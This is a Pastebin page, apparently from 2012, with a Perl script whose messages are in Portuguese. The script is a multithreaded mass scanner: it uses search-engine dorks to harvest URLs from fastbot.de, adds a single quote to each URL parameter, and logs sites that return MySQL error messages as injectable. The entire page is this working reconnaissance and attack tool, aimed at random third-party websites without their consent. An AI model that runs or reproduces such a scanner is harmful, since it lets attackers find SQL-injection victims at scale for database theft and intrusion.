Advertisement
Googleinurl

Scanner perl SQL - ERROR Fastbot

Aug 31st, 2012
1,575
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.78 KB | None | 0 0
  1. #!/usr/bin/perl
  2. BEGIN { $ENV{ACTIVEPERL_CONFIG_DISABLE} = 1; }
  3.  
  4. #perl2exe_exclude "File/BSDGlob.pm"
  5. #perl2exe_exclude "Compress/Bzip2.pm"
  6. #perl2exe_exclude "I18N/Langinfo.pm"
  7. #perl2exe_include "attributes.pm"
  8.  
  9.  
  10. use strict;
  11. no warnings;
  12. use threads;
  13. use threads::shared;
  14. use LWP::UserAgent;
  15. use HTTP::Request::Common qw(POST);
  16.  
  17.  
  18. my $threads = 10;
  19.  
  20. my $ua = LWP::UserAgent->new;
  21. $ua->timeout(15);
  22. $ua->agent('Mozilla/5.0');
  23.  
  24. my @dorkz : shared;
  25. my @linkz : shared;
  26.  
  27. system("cls");
  28. system("color A");
  29. print "++++++++++++++++++++++++++++++++++++++++++++++++\n";
  30. print "+             SCANNER DORK FASTBOT             +\n";
  31. print "+                                              +\n";
  32. print "++++++++++++++++++++++++++++++++++++++++++++++++\n";
  33. print "\n[i]Motor carregado: fastbot.de\n";
  34. print "\[.]Iniciando...\n";
  35. GetDorkz();
  36.  
  37. print "[i]Got ".scalar(@dorkz)." dorkz\n";
  38. GetLinks();
  39. while (threads->list) {}
  40. print "[i]Got ".scalar(@linkz)." links\n";
  41. print "[.]Iniciando...\n\n";
  42. CheckLinks();
  43. while (threads->list) {}
  44. print "[!]Tudo feito, checar output_injection.txt\n\n";
  45.  
  46.  
  47. sub CheckLinks {
  48.         foreach my $link( @linkz ) {
  49.                 my  $ctr = 0;
  50.                 foreach my $thr ( threads->list ) { $ctr++; }
  51.                 if ($ctr < $threads){
  52.                         threads->create( \&InjectionCheck, $link );
  53.                 }
  54.                 else { redo; }
  55.         }
  56. }
  57.  
  58. sub GetLinks {
  59.         foreach my $dork( @dorkz ) {
  60.                 my  $ctr = 0;
  61.                 foreach my $thr ( threads->list ) { $ctr++; }
  62.                 if ($ctr < $threads){
  63.                         threads->create( \&GetLinks_fastbot,$dork );
  64.                 }
  65.                 else { redo; }
  66.         }
  67. }
  68.  
  69. sub GetDorkz {
  70.         open( DORKZ, "input.txt" ) or die "$!\n";
  71.         while( defined( my $line_ = <DORKZ> ) ) {
  72.                 chomp( $line_ );
  73.                 push( @dorkz, $line_ );
  74.         }
  75.         close( DORKZ );
  76. }
  77.  
  78. ## FASTBOT-MOTOR
  79. ## http://www.fastbot.de/index.php?page=1&query=index.php?id=
  80. sub GetLinks_fastbot {
  81.         my $dork = shift;
  82.         chomp( $dork );
  83.         for( my $i = 1; $i < 11; $i++ ) {
  84.                 my $url = "http://www.fastbot.de/index.php?page=".$i."&query=".$dork;
  85.                 my $content = $ua->get($url)->content;
  86.                 while( $content =~ m/melden\.php\?url=(.+?)&query=/gi ) {
  87.                         my $link = $1;
  88.                         $link =~ s/&amp;/&/g;
  89.                         #print $link."\n";
  90.                         push( @linkz, $link );
  91.                 }
  92.         }
  93.         threads->detach();
  94. }
  95.  
  96. sub InjectionCheck {
  97.         my $link = shift;
  98.         chomp( $link );
  99.         print "[:]Verificando..: $link\n";
  100.         my $content = $ua->get($link)->content;
  101.         for(my $position = 0; ($position = index($link, "=", $position)) >= 0; $position++) {
  102.                 my $linkcpy = $link;
  103.                 substr($linkcpy, $position, 1) = "='";  
  104.                 my $content2 = $ua->get($linkcpy)->content;
  105.                 unless( $content eq $content2 ) {
  106.                         if( $content2 =~ m/mysql_fetch_/i || $content2=~ m/You have an error in your SQL syntax/i || $content2 =~ m/tem um erro de sintaxe no seu SQL/i || $content2 =~ m/mysql_num_rows/i || $content2 =~ m/Division by zero in/i ) {
  107.                                 print "[+]VULL:========>>>>>>> ".$linkcpy."\n";
  108.                                 Output( $linkcpy );
  109.                                 threads->detach();
  110.                         }
  111.                 }
  112.         }
  113.         threads->detach();
  114. }
  115.  
  116. sub Output {
  117.         my $para = shift;
  118.         open (OUT, '>>output_injection.txt') or die("Não é possível gravar output_injection\n");
  119.         print OUT $para."\n";
  120.         close (OUT);
  121. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement